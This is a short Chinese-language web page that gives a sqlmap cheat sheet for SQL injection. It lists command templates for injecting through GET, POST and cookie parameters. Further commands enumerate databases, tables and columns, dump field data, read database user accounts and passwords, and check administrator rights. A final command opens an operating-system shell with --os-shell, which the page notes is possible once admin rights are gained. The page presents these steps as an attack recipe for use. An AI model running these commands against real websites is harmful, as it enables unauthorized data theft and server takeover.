您好,登錄后才能下訂單哦!
SQLMAP
GET 方式的注入 sqlmap.py -u "URL"
POST 方式的注入 sqlmap.py -u "URL" --data "POST參數(shù)=POST數(shù)值"
COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"
爆數(shù)據(jù)庫名(cookie根據(jù)實(shí)際的情況) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs
爆目標(biāo)數(shù)據(jù)庫中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數(shù)據(jù)庫名 --tables
爆目標(biāo)數(shù)據(jù)表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數(shù)據(jù)庫名 -T 表名 --columns
導(dǎo)出目標(biāo)字段的數(shù)據(jù) sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數(shù)據(jù)庫名 -T 表名 -C 要導(dǎo)出數(shù)據(jù)的字段名,多個字段用逗號分隔 --dump
爆出目標(biāo)庫有多少數(shù)據(jù) sqlmap.py -u "URL" [--cookie "cookies 值"] -D 數(shù)據(jù)庫名 --count
檢測當(dāng)前用戶 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user
檢測當(dāng)前用戶是否管理員 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba
檢測數(shù)據(jù)庫用戶 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0
檢測數(shù)據(jù)庫用戶密碼 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0
檢測當(dāng)前數(shù)據(jù)庫 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db
多線程 -threading 5
如果是管理員,我們可以寫Shell
操作系統(tǒng)Shell寫入
sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。